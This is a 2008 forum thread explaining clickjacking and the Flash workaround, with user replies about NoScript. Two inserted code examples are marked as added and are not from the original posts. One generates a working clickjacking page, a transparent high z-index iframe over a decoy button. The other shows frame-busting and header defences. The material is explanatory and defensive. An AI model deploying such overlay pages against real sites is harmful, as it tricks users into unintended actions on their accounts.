
Clickjacking - What is it?


6 replies to this topic

#1 harrywaldron

    Security Reporter


  • Members
  • 509 posts
  • Gender:Male
  • Location:Roanoke, Virginia

Posted 20 October 2008 - 10:13 AM

While clickjacking is not a new concept, it's gaining popularity as a technique used by malicious websites. As iFrames are logical divisions of a webpage, the approach is to create a "transparent iFrame page" that lines up exactly with the real web page being accessed. The buttons in the "invisible iFrame page" replace the buttons in the real web page. When the user clicks on the button, they may allow malicious software to be loaded or allow security at the true site they were trying to access to be compromised.

The Adobe Flash facility is one of the most widely installed software products in the world, as it's used by all major browsers. Adobe Flash (v9 and lower) is vulnerable to these attacks and it's a popular method now being used to achieve clickjacking. To stay protected from this threat, users should move to Adobe Flash v10, keep AV protection updated, keep all O/S and browsers updated, and avoid risky websites.

Clickjacking - What is it?
http://www.avertlabs.com/research/blog/index.php/2008/10/15/clickjacking/
http://en.wikipedia.org/wiki/Clickjacking
http://www.mxlogic.com/itsecurityblog/1/2008/10/What-is-ClickJacking.cfm
http://www.computerworld.com/action/article.do?command=viewArticleBasic&articleId=9115818
http://blogs.zdnet.com/security/?p=1972
http://www.securityfocus.com/news/11534?ref=rss
http://www.schneier.com/blog/archives/2008/10/clickjacking.html

QUOTE: Let's use an example. You have a web page A controlled by an attacker. A contains an IFRAME element B. In a clickjack attack, B would be set to transparent and the z-index property of the layer set higher than other elements of page A via CSS. B will also need to be big enough so that the user can click its content. The attacker can then place any button to do anything he wants in B. Then the attacker can place some buttons on page A. The location of the buttons in B must match the buttons in A. So when the user clicks on a button on page A, they are actually clicking the button in B because the z-index property of B's buttons is higher than A's buttons. This attack uses DHTML and does not require JavaScript, so disabling JavaScript will not help.

This vulnerability affects multiple web browsers. Unfortunately, no patch for it is currently available, so users should be careful. The vulnerability has also been found to affect Adobe Flash Player, the most popular rich media internet application today. Adobe has released a security advisory and provided a workaround.

Clickjacking - Adobe recommended workarounds (move to version 10)
http://msmvps.com/blogs/harrywaldron/archive/2008/10/16/adobe-flash-version-10-security-release-fixes-many-bugs.aspx
http://www.adobe.com/support/security/advisories/apsa08-08.html
http://www.adobe.com/support/security/bulletins/apsb08-18.html
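The layout the quoted text describes, written out as an added example (this is not code from the original post or from the quoted Avert Labs article; the URLs, button labels and coordinates are invented). Attacker page A carries a visible decoy button; the real site is loaded in iframe B, which is made transparent, oversized and given a higher z-index so that B's sensitive button sits exactly over A's decoy. The hit test reproduces, without a browser, the rule that makes this work: pointer events go to the topmost element at that point regardless of how visible it is.

```javascript
// Added example, not part of the original post or the quoted article.
// Models the "page A with transparent iframe B" clickjacking layout.

// A positioned element as the browser sees it when deciding who gets a click.
// opacity is stored for the reader but deliberately never consulted by
// hitTest(): clicks are routed by geometry and stacking order, not by what
// the user can see, and that is the whole trick.
function element(name, x, y, w, h, zIndex, opacity) {
  return { name, x, y, w, h, zIndex, opacity };
}

function contains(el, px, py) {
  return px >= el.x && px < el.x + el.w && py >= el.y && py < el.y + el.h;
}

// The element that receives a click at (px, py): highest z-index among those
// whose box contains the point; on equal z-index the later one wins, which is
// how document order breaks ties in a browser.
function hitTest(elements, px, py) {
  let target = null;
  for (const el of elements) {
    if (!contains(el, px, py)) continue;
    if (target === null || el.zIndex >= target.zIndex) target = el;
  }
  return target;
}

// Attacker's page A as HTML (hypothetical targetUrl and decoy geometry):
// one decoy button, and B stretched over the whole page with opacity:0 and
// a higher z-index than anything on A.
function buildAttackerPage(targetUrl, decoy) {
  return [
    '<!DOCTYPE html><html><body>',
    `<button style="position:absolute;left:${decoy.x}px;top:${decoy.y}px;` +
      `width:${decoy.w}px;height:${decoy.h}px;z-index:1">${decoy.label}</button>`,
    `<iframe src="${targetUrl}" style="position:absolute;top:0;left:0;` +
      'width:2000px;height:2000px;opacity:0;border:0;z-index:10"></iframe>',
    '</body></html>',
  ].join('\n');
}

// Constructed scene for the hit test: the decoy on A and the sensitive
// button of the framed site in B occupy the same 120x40 box at (100,100).
function demoScene() {
  return [
    element('A: decoy "Play video"', 100, 100, 120, 40, 1, 1.0),
    element('B: real "Confirm" button', 100, 100, 120, 40, 10, 0.0),
  ];
}

// Name of the element that actually receives a click at (px, py).
function whoGetsTheClick(px, py) {
  const hit = hitTest(demoScene(), px, py);
  return hit ? hit.name : null;
}
```

Open the string returned by `buildAttackerPage` in a browser and every click on "Play video" is delivered to the framed site's button at that spot: the user sees A, the framed site sees a genuine click on B. `whoGetsTheClick(150, 120)` names B even though B has zero opacity; note that nothing in the attacker's page needs JavaScript, which is why the quoted text says disabling it does not help.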


#2 MaraM

  • Members
  • 1,717 posts
  • Gender:Female
  • Location:British Columbia, Canada

Posted 26 October 2008 - 03:58 PM

Thanks so much for the information, harrywaldron!

Just wondering if, for those of us that are a tad mind-boggled by much of this type of thing, would it be easier to simply download the latest version of Adobe? And if so, does one need to uninstall the older version prior to installing the new one, or does it overwrite itself, please?
Never let your computer realize you are in a hurry or just typing the last few words of a vital document.

While outer events might make one happy or sad, happiness itself is entirely internal, and at all times completely within one's power.

#3 JTyler

  • Members
  • 2 posts

Posted 06 November 2008 - 12:43 PM

ClickJacking.... so what will people think of next to mess with us regular folks. Speaking from the point of view of someone with kids, it sure does become hard to monitor their internet surfing when I myself don't know what to trust.
And why can't Flash do something about this? Seems it would be important wouldn't it?
Janice

#4 buttoni

  • Members
  • 267 posts
  • Gender:Female
  • Location:Temple, Texas

Posted 10 November 2008 - 08:42 PM

I use FX 3.0 with NoScript add-on and NoScript saved my butt this week from a ClickJack attempt. We killed a gigantic 3" spider in our bathroom the other day. It scared the @#$% out of me, as I almost stepped on it barefoot! It had identifying back markings that positively confirmed our suspicion it was a Brown Recluse Spider!!! VERY bad bites that can cost you a foot, leg, or arm. The venom destroys tissue! :thumbsup:

Anyway, to get back to the reason for my post........Went to a website of spider pics to help ID the spider we had killed. The second I clicked on one particular spider pic for the enlargement, NoScript popped up a warning box about an attempted ClickJacking. NoScript has never, EVER talked to me before. I blocked it and got off the site immediately. Scanned my pc then with MBAM, SAS and AVAST and was found clean. Whew! Funny thing is I had JUST read about ClickJacking not one day earlier on one of my other tech forums.

Edited by buttoni, 10 November 2008 - 09:30 PM.

HP Pavilion desktop p6270z; 8 GB ram; Win7 Home Premium x64 bit; FX 4.0; DSL 2Wire modem/router; MVPS Hosts; Comodo FW 5.3(D+ & Sandbox enabled); MSSE; MBAM on demand.

#5 K12hf986

  • Members
  • 14 posts
  • Gender:Female

Posted 14 November 2008 - 04:51 PM

My NoScript saved me from a ClickJacking attempt
"A person who never made a mistake never tried anything new."
Albert Einstein

#6 rangecoach

  • Members
  • 92 posts
  • Gender:Male
  • Location:TX, by way of IL, CA, NC, NJ and PA

Posted 16 November 2008 - 03:24 PM

Is there a NoScript application for IE?
The early bird may get the worm but the second mouse gets the cheese.

You are never defeated until you admit it. Gen. Patton

#7 PedroDaGr8

  • Members
  • 6 posts
  • Location:Lexington, KY, USA

Posted 22 November 2008 - 06:33 PM

I am curious. Maybe it is the fact that when it comes to webpages I am a bit of a neophyte. I can do HTML but that is about it. What is the purpose of having the ability to set an iframe to transparent? Why is this necessary and why can't IT be blocked?
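On the question raised in the post above, as an added example that is not part of this thread: transparency is an ordinary CSS effect that applies to any element, so the browser has no way to tell a decorative overlay from a clickjacking overlay, and that is why it is not simply "blocked". What the framed site itself can do is notice that it is not the top-level document and refuse to run inside someone else's page. The functions take a window-like object as a parameter so the logic can be exercised outside a browser; in a real page you would pass the global `window`. The `makeTopLevelWindow` and `makeFramedWindow` helpers are constructed stand-ins for browser objects, not real DOM.

```javascript
// Added example, not from any post in this thread: how a site can detect
// that it has been loaded inside another page's iframe (the position of
// page B in the quoted description) and break out of it.

// For a top-level document, window.self and window.top are the same object.
function isFramed(win) {
  return win.self !== win.top;
}

// Frame-busting, the site-side mitigation in common use when this thread was
// written: if we are framed, navigate the top window to our own URL so the
// attacker's page is replaced by the real site. Returns what it did so the
// caller (or a test) can check the outcome.
function frameBust(win) {
  if (!isFramed(win)) {
    return { framed: false, action: 'none' };
  }
  try {
    // Writing top.location is allowed cross-origin (reading it is not).
    win.top.location.href = win.self.location.href;
    return { framed: true, action: 'redirected top' };
  } catch (err) {
    // If the navigation is refused, at least stop rendering clickable content.
    win.document.body.style.display = 'none';
    return { framed: true, action: 'hid body' };
  }
}

// Constructed stand-in for a top-level browser window (hypothetical shape).
function makeTopLevelWindow(url) {
  const w = { location: { href: url }, document: { body: { style: {} } } };
  w.self = w;
  w.top = w;
  return w;
}

// Constructed stand-in for a window loaded inside an iframe on attackerUrl.
function makeFramedWindow(url, attackerUrl) {
  const top = makeTopLevelWindow(attackerUrl);
  const w = { location: { href: url }, document: { body: { style: {} } }, top };
  w.self = w;
  return w;
}
```

Script-based frame-busting of this kind can be defeated by a determined framing page, so sites today send the `X-Frame-Options` or `Content-Security-Policy: frame-ancestors` response header and let the browser refuse to render them in a frame at all; the NoScript warnings described in posts #4 and #5 attack the same problem from the user's side of the browser.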



